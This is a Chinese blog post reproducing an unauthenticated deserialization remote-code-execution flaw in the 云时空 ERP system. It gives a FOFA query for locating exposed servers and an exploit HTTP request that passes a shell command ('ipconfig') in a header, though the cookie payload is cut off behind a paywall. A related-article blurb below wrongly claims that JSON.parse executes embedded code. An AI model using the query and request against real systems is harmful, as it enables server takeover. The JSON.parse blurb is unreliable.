【漏洞复现】云时空社会化商业ERP public.js 反序列化漏洞

最新推荐文章于 2024-09-13 08:33:26 发布
最新推荐文章于 2024-09-13 08:33:26 发布
阅读量526 收藏
点赞数 10
分类专栏: 漏洞复现 文章标签: javascript 开发语言 ecmascript 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67810151/article/details/136948088
版权

0x01 产品简介

云时空社会化商业ERP以大型集团供应链系统为支撑,是基于互联网技术的多渠道模式营销服务管理体系,可以帮助您整合线上和线下交易模式,覆盖企业经营管理应用各个方面。

0x02 漏洞概述

云时空社会化商业ERP系统存在反序列化漏洞,未授权的攻击者可以通过该漏洞远程执行代码,控制服务器。

0x03 测绘语句

fofa: title="云时空社会化商业ERP系统"

0x04 漏洞复现

GET /static/js/public.js HTTP/1.1

Host:

Accept-Encoding: gzip, deflate, br

Accept: */*

Accept-Language: en-US;q=0.9,en;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36

X-Token-Data: ipconfig

Cookie: rememberMe=
了解本专栏 订阅专栏 解锁全文 超级会员免费看
从不学安全
关注
专栏目录
订阅专栏
时空社会化商业 ERP 系统 service SQL 注入漏洞复现
0xSec
11-30 1002
时空社会化商业ERP service接口处存在SQL注入漏洞,未授权的攻击者可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息),甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
Java反序列化漏洞利用工具.zip
04-10
Java反序列化漏洞是软件安全领域的一个重要话题,它涉及到Java应用程序在处理序列化和反序列化过程中的安全问题。序列化是将对象状态转换为可存储或传输的数据格式的过程,而反序列化则是将这些数据恢复为原来的对象...
java反序列化漏洞-验证.rar
06-25
Java反序列化漏洞是软件安全领域的一个重要话题,尤其对于使用Java进行开发的系统来说,理解和防范这种漏洞至关重要。在Java编程中,序列化和反序列化是常见的数据传输和持久化手段,允许对象的状态被转换为字节流,...
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
在提到的 "shiro_attack_by J1anfen" 工具中,重点是针对 Apache Shiro 的一个特定安全问题:反序列化漏洞反序列化漏洞通常出现在程序中,当接收到从网络或持久存储中读取的数据,并将其转换回原来的对象实例时...
基于 Java 的亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用
07-01
【作品名称】:基于 Java 的亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期...
软件著作权申请教程(超详细)(2024新版)软著申请
m0_75269526的博客
09-09 2809
软件著作权,软著,软著申请,软用户使用手册:提交登记软件的任何一种文档的连续的前30页和连续的后30页,每页不少于30行。如果是多人合作开发著作权人不是一个人的话,还需要准备一份合作开发协议。首先我们需要在官网里面注册一个账号,并且完成实名认证,一般是注册【个人】的身份。合作开发协议书:这个如果是著作权人有多个(多个人一起开发)就需要提供这个材料。在填报完成之后需要打印一个签章页签字(如果不是个人需要盖章)注册完成后点击下面进行登记,如果没有实名需要先实名认证(源代码:源程序前连续的30页和后连续的30页。
js中【Worker】相关知识点详细解读
2301_79858914的博客
09-11 852
JavaScript 中的 Worker 是一个可以在后台线程中运行代码的 API,这样可以避免主线程(通常是 UI 线程)被阻塞。使用 Worker 时,JavaScript 可以在多线程环境中工作,解决了单线程的瓶颈问题。通常情况下,JavaScript 是单线程的,也就是所有的代码(包括 DOM 操作和事件处理等)都在同一个线程里执行。如果某段代码需要大量计算,或者运行时间过长,会阻塞整个页面,导致界面卡顿甚至崩溃。Worker提供了一种将复杂或耗时的任务分配到后台线程执行的方法。
echarts.js+china.js实现中国地图各省数据案例
qq_58258855的博客
09-11 431
实现中国地图各省数据案例
JS笔记
2201_76100326的博客
09-11 866
javascript中的对象分为3种:自定义对象,内置对象,浏览器对象 JavaScript 中的所有事物都是对象:字符串、数字、数组、日期,等等。在 JavaScript 中,对象是拥有属性和方法的数据。属性是与对象相关的值。方法是能够在对象上执行的动作。.关键词()
JavaScript基础
zhangh040629的博客
09-10 1290
//** 控制浏览器弹出一个警告框* alert()*/alert;/** 让计算机在页面中输出一个内容*/write;/** 向控制台输出一个内容*/log;</</</</
jEasyUI 创建带复选框的树形菜单
wjs2024的博客
09-10 351
jEasyUI 是一个基于 jQuery 的框架,它为用户提供了一套完整的用户界面组件,包括菜单、窗口、表格等。在本文中,我们将重点介绍如何使用 jEasyUI 创建一个带复选框的树形菜单。
vue3中动态引入本地图片的两种方法
haodanzj的博客
09-11 251
动态在本地引入图片
JS的输出语句
最新发布
J3259392566的博客
09-13 195
js中严格区分大小写。
八十多种证件识别接口-JavaScript身份证识别API示例-护照识别-户口页识别
weixin_41711744的博客
09-12 578
证件识别API包含了身份证识别、护照识别、户口页识别、港澳台来往通行证识别等八十多种证件识别类型,提供了快速、精准的证件信息提取功能,广泛应用于实名认证 、机场出入口等场景。身份证识别API常用于在线支付、金融服务、酒店入住等需要进行实名认证和提取身份信息的场景。在这些场景中,通过快速识别和验证身份证信息,可以有效提高处理速度,减少人为错误,增强安全性。八十多种证件识别接口提供了一种高效、精准的识别方式来读取各类证件信息,通过合理应用这些技术,可以大幅提升用户体验和企业运营效率。
echarts饼图内容循环播放实现
qq_39877681的博客
09-12 269
echarts饼图内容循环播放实现
服装|基于Java+vue的服装定制系统(源码+数据库+文档)
weixin_66413741的博客
09-10 658
服装定制将是广大用户们不可忽视的一块。但是管理好服装定制又面临很多麻烦需要解决,我们可以发现服装定制方面的系统并不是相当普及,在服装定制方面的可以有许多改进。即服装定制系统慢慢的被人们关注。服装定制管理方面的任务繁琐,以至于每年都在服装定制管理这方面投入较多的精力却效果甚微,
js实现动态生成不固定数量的气泡
丁哒哒的博客
09-10 274
【代码】js实现动态生成不固定数量的气泡。
常见文档工具对比和选择
qq_41765777的博客
09-09 923
文档工具的本质,其实都是将我们的文档内容标准化,在互联网环境上的文档,一般目前比较主流的是生成文档的 html 网页内容,而文档内容的作者都比较倾向于使用纯文本的 Markdown 进行书写,所以文档工具的核心内容主要就是将 Markdown 转换为一个 html 的网站内容。
JSON.parse反序列化漏洞
02-19
JSON.parse反序列化漏洞是一种安全漏洞,它存在于使用JSON.parse函数解析恶意构造的JSON字符串时。当JSON字符串中包含恶意代码时,JSON.parse函数会将其解析为JavaScript对象,并执行其中的代码,从而导致安全问题。 这种漏洞的出现主要是因为JSON.parse函数在解析过程中对于某些特殊字符的处理不够严格,导致恶意代码得以执行。攻击者可以通过构造恶意的JSON字符串,将恶意代码注入到解析后的JavaScript对象中,从而实现代码执行、信息泄露等攻击行为。 为了防止JSON.parse反序列化漏洞,可以采取以下措施: 1. 输入验证:对于接收到的JSON字符串进行严格的输入验证,确保其中不包含恶意代码。 2. 使用安全的解析库:使用经过安全验证的JSON解析库,如JSON.parse函数的替代方案,来避免漏洞的利用。 3. 限制权限:在解析后的JavaScript对象中限制执行权限,避免恶意代码的执行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

从不学安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值